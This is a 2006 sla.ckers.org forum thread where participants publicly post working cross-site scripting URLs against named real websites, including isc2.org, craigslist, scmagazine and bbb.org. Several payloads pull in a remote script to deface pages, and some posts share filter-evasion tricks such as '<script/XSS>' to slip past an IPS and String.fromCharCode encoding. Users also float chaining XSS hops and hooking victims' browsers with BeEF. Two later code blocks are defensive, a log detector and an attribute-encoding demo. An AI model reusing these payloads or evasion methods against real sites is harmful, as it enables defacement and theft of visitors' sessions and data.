Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:08PM

http://ha.ckers.org/expect.swf?http://www.hoovers.com/

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:10PM

Kyran, you may be right, although the only reason I use the alert box is to prove that JavaScript can be injected... xss.js is more to prove you can include remote files into the HTML. Both are valid tests to prove XSS is possible. Personally I prefer the alert box because it's faster to test for and more obviously benign, but be my guest if you want to use the remote include.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 01:11PM

Imagine if we had all our XSSes change location.href to another of our XSSes. We could create a pretty damn long chain of hops.

rsnake, that reflect thing works on every pre 1.3.35, 2.0.58, and 2.2.2 Apache server that doesn't have a custom 417 error page. This includes e-commerce sites like overclocking.co.uk

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:13PM

Thinking of making an XSS enabled web-ring? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 01:16PM

I guess I was just pondering.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:29PM

I got a special request to enhance the defacements. This one is going out to all you XSS haXorz out there (same exploit - different flavor): http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org/weird/stallowned.js%20&sSection=ALL&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 22, 2006 01:37PM

Well I would guesstimate that at least 75% of these with alert boxes can load remote scripts as well (i'm too lazy to run a tally) .. so while i like the idea of uniformity, everyone aside from the dumbest of skiddies should be able to figure out how to test remote inclusion.

Once the hole has been shown to be there, and precisely how to overcome its filters if any - the method of exploitation i'll leave as an exercise for the exploiter.

That being said: rather than uniformity in the PoC demonstration, i think it would be much nicer for uniformity in its cataloging .. i.e. adopt a bug report type form

I'm also too lazy to decide on all the form fields but along the lines of:

PoC link(s):
Max Length:
Filtering:
Type(s): (anything, html, <script></script>, parameter inclusion - which tag, etc.)
umm.. any other brainstorming? maybe we should make a new thread for such discussion .. however I'd keep it optional, cuz i'm usually too lazy for such forms except for interesting sites or filters

that also may make this more of an emulation of securityfocus.com sans moderation _-_ .. i don't know if that's an improvement or not

-maluc

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:46PM

As long as it's interesting and (vaguely) relevant I have no interest in moderation so I won't institute it unless something starts annoying me. Spam is not tolerated, everything else is okay. I would never force someone to construct an exploit in a certain way either. It's your choice how you disclose.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 22, 2006 01:54PM

ahaha rsnake.. love the hair.

https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8

-maluc

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 02:04PM

Oh dear lord... ISC2? Ouch!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 22, 2006 02:15PM

How about another.. but this time persistent. https://www.isc2.org/cgi-bin/request_studyguide_process.cgi?AG=44330&Type=a1dcxbn&LName=qwerty&FName=HiMom&City=SoUnsecure

the email field in https://www.isc2.org/cgi-bin/request_studyguide_form.cgi?AG=44330 is unfiltered, except no spaces.. but on the bright side 'To protect your information, your response is 128-bit SSL enabled and all information is encrypted.'

-maluc

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 03:02PM

That's really bad... I heard ISC2 was compromised at one point. Every security guy's personal information let loose. Not good.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 22, 2006 03:37PM

Ouch. Also, while the normal remote text example is fine, I might start using that stallowned.js, for..uhm...Proof of Stallownage.
Yeah. That's it.

- Kyran

Re: So it begins
Posted by: id
Date: September 22, 2006 03:42PM

Ahahhahahahaha, no no wait, HAHAHAHA

really I don't like those fuckers, not that I am bitter that I was turned down for a job because I didn't have my CISSP...I went to 2 study sessions and couldn't believe the crap they were spouting and never went back.

__MOST POINTLESS CERT EVER__

-id

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 03:51PM

Kyran, be my guest. Hahah.

id, wait, if you didn't get a job because of it I think that by definition gives it a point. Quod erat demonstrandum. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 04:28PM

Watchfire's marketing might be dirty pool, but it sure is funny: http://ha.ckers.org/images/scmagazine-stallowned.png

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 22, 2006 04:32PM

Ahahahaha. That's hysterical.

- Kyran

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 04:36PM

Hahah... well it looks like we made some friends: http://www.darkreading.com/blog.asp?blog_sectionid=342&f_src=darkreading_section_342

I applaud darkreading for jumping on this, and for issuing their retort. It's nice to see journalistic integrity.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 22, 2006 04:46PM

That's great! I love that people are really taking to this.
We've shown that it's really an issue. With a little e-mailing and a little luck, any xss hole can turn into a disaster for the company and their site.

Most importantly(to me ahaha), a few of the found exploits mentioned are mine.

Ego +1

- Kyran

Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 04:49PM

HAHAHAHA
Oh man. I loved that.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: kirke
Date: September 22, 2006 04:57PM

> .. perhaps we should all use the ha.ckers.org/xss.js script ..
why not using BeEF/hook/ ?
Then you can see who got trapped (at least those who have malware enabled in their browser;-)

Re: So it begins
Posted by: Kyran
Date: September 22, 2006 05:03PM

I personally feel we should test out using SRC instead of just an alert.
I know most of the time, if you can get an alert, you can get a remote script going, but it is not always the case. In the MySpace classifieds a few weeks back, I could get an Alert off, but not a remote script or anything else. It's totally fixed now, but you get the idea.

- Kyran

Re: So it begins
Posted by: kirke
Date: September 22, 2006 05:32PM

if you can pass alert, then you still can use parentheses, a comma is not a problem usually, hence you have anything you need for eval(String.fromCharCode()), probably an unescape() is sufficient too ...
Any problems?

Re: So it begins
Posted by: maluc
Date: September 22, 2006 07:32PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://search.bbb.org/?searchtype=url&url=%27%3E%3Cscript%2Fmaluc%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E%3Cb+%27&search=Search better business bureau

it has an IPS that closes connection if you send <script> .. but <script/XSS> works fine.

-maluc
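The IPS in the post above matched the literal string `<script>` and missed `<script/XSS>`. The following is an added example, not code from the thread or from any site it names: a log check that percent-decodes the request path first and then looks for `<script` followed by anything a browser's tokenizer accepts after a tag name (whitespace, `/` or `>`), run over constructed access-log lines.

```javascript
// Constructed sample lines in combined-log style (hosts and paths are made up).
const SAMPLE_LOG = [
  '10.0.0.5 - - [22/Sep/2006:19:32:01 +0000] "GET /search?q=%27%3E%3Cscript%2Fmaluc%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 512',
  '10.0.0.6 - - [22/Sep/2006:19:32:02 +0000] "GET /search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 512',
  '10.0.0.7 - - [22/Sep/2006:19:32:03 +0000] "GET /search?q=javascript+tutorial HTTP/1.1" 200 512',
  '10.0.0.8 - - [22/Sep/2006:19:32:04 +0000] "GET /search?q=%3CSCRIPT%20src%3D%2F%2Fexample.invalid%2Fx.js%3E HTTP/1.1" 200 512',
];

// Normalise before matching: fold '+' to space, percent-decode (twice, so one
// level of double encoding is also caught), lower-case. Malformed escapes
// stop the decoding loop instead of throwing.
function normalizeQuery(path) {
  let s = path.replace(/\+/g, ' ');
  for (let n = 0; n < 2; n++) {
    try { s = decodeURIComponent(s); } catch (e) { break; }
  }
  return s.toLowerCase();
}

// Tag-start pattern: "<script" followed by whitespace, "/" or ">", i.e. any
// character that ends a tag name for the HTML tokenizer, not only ">".
// "javascript" in ordinary text does not match because there is no "<".
const SCRIPT_TAG = /<script(?=[\s\/>])/;

// Pull the request target out of a combined-log line ('' if none found).
function requestPath(line) {
  const m = /"(?:GET|POST|HEAD) ([^ ]+) HTTP\/[\d.]+"/.exec(line);
  return m ? m[1] : '';
}

// Returns the indexes of the log lines whose request path carries a script tag.
function flagScriptTags(lines) {
  const hits = [];
  lines.forEach((line, idx) => {
    if (SCRIPT_TAG.test(normalizeQuery(requestPath(line)))) hits.push(idx);
  });
  return hits;
}

console.log(flagScriptTags(SAMPLE_LOG));
```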

Re: So it begins
Posted by: digi7al64
Date: September 22, 2006 07:36PM

http://sfbay.craigslist.org/search/sss?query=</title>%3Cscript>alert('quack')</script>
http://sfbay.craigslist.org/search/sss?query=</title></head><body>%3Cscript%20src=http%3A%2F%2Fha.ckers.org/weird/stallowned.js></script> << for rsnake

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Kyran
Date: September 23, 2006 01:07AM

http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1

This was posted on the first page; I noticed something rather interesting.
In opera, this specific string doesn't produce an alert.

It comes out like this.
<input type="text" name="subject" value=""<SCRIPT>alert("XSS")</SCRIPT>"" size="30" maxlength="100" />
But, I have to close the previous tag before the script will run.
<input type="text" name="subject" value=""/><SCRIPT>alert("XSS")</SCRIPT><"" size="30" maxlength="100" />
(the last < was just to prevent the html from showing. )

It shows </script> in red, meaning it's only one tag, without a partner. The first <script> is in blue, showing it's PART of a tag, not a single tag itself.

Not really sure if it regards to anything...it's just odd.

- Kyran

Re: So it begins
Posted by: Kyran
Date: September 23, 2006 04:20AM

a <style> at the end of an XSS string will eliminate the rest of the page if there is no closing style tag.

- Kyran

Re: So it begins
Posted by: kirke
Date: September 23, 2006 06:28AM

> It shows </script> in red, ... The first <script> is in blue ...

are you talking about mozilla's "View Source"?
Then keep in mind that it shows what it rendered, not what it got as response body from the server!

Re: So it begins
Posted by: maluc
Date: September 23, 2006 11:18AM

he is talking about Opera 9's View Source .. which highlights now too. Opera 8.5x does not.

and the reason the opening <script> is in blue is because it gets inserted inside of the input tag.. Opera translates it as a parameter, with an empty value

i.e.: <INPUT type="text" name="subject" value="" <SCRIPT=""/>

thus the alert() is no longer part of an inline script, and </SCRIPT> has nothing to close. The full Opera translation being

<INPUT type="text" name="subject" value="" <SCRIPT=""/>alert("XSS")"" size="30" maxlength="100" /&gt;


Yet another way to tell the different browsers apart, which can't be spoofed like userAgent can.

-maluc
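To make the two posts above concrete (Kyran's Opera observation and maluc's explanation of it), here is an added example that is not code from the thread or from the site it discusses. It renders a constructed `<input>` template the vulnerable way and the attribute-encoded way, then runs a minimal HTML5-style start-tag tokenizer over both: the vulnerable output yields an attribute named `<script`, exactly the behaviour maluc describes, and the HTML5 tokenizer that later browsers standardised treats a `<` in attribute-name position the same way. The template, the sample subject and the tokenizer are all assumptions of this example.

```javascript
// Constructed input: the thread's PoC subject string after URL decoding.
const SAMPLE_SUBJECT = '"<SCRIPT>alert("XSS")</SCRIPT>"';

// Vulnerable template (constructed, not the real site's code): untrusted text
// is dropped straight into a quoted attribute value.
function renderVulnerable(subject) {
  return `<input type="text" name="subject" value="${subject}" size="30" maxlength="100" />`;
}

// Fix: HTML attribute encoding. Escaping these five characters means the
// value can never close the quote or start a new tag or attribute.
function attrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(subject) {
  return renderVulnerable(attrEncode(subject));
}

// Minimal HTML5-style tokenizer for the first start tag only. It returns the
// attribute names a browser derives and the text left after the tag's ">".
// Modelled rules: a quoted value ends at its matching quote; any character
// other than whitespace, "/" or ">" right after it begins a new attribute
// name, and "<" is allowed inside a name (a parse error, not a new tag).
function tokenizeFirstTag(html) {
  let i = html.indexOf('<') + 1;
  while (i < html.length && !/[\s\/>]/.test(html[i])) i++;      // tag name
  const names = [];
  while (i < html.length && html[i] !== '>') {
    if (/[\s\/]/.test(html[i])) { i++; continue; }
    let name = '';
    while (i < html.length && !/[\s=>\/]/.test(html[i])) name += html[i++];
    names.push(name.toLowerCase());
    while (i < html.length && /\s/.test(html[i])) i++;
    if (html[i] !== '=') continue;                                // no value
    i++;
    while (i < html.length && /\s/.test(html[i])) i++;
    const q = html[i];
    if (q === '"' || q === "'") {
      const end = html.indexOf(q, i + 1);
      i = end < 0 ? html.length : end + 1;
    } else {
      while (i < html.length && !/[\s>]/.test(html[i])) i++;      // unquoted
    }
  }
  return { names, after: html.slice(i + 1) };
}

console.log(tokenizeFirstTag(renderVulnerable(SAMPLE_SUBJECT)));
console.log(tokenizeFirstTag(renderSafe(SAMPLE_SUBJECT)));
```

Kyran's second string works because its leading `"/>` closes the input tag first, so the `<SCRIPT>` that follows is parsed as a tag of its own; with attribute encoding applied no such boundary exists in either case.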

Re: So it begins
Posted by: maluc
Date: September 23, 2006 11:31AM

http://preference.the-dma.org/cgi/optoutemps2.php?email1=You+have+an+XSS+hole%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E&email2=&email3=

-maluc
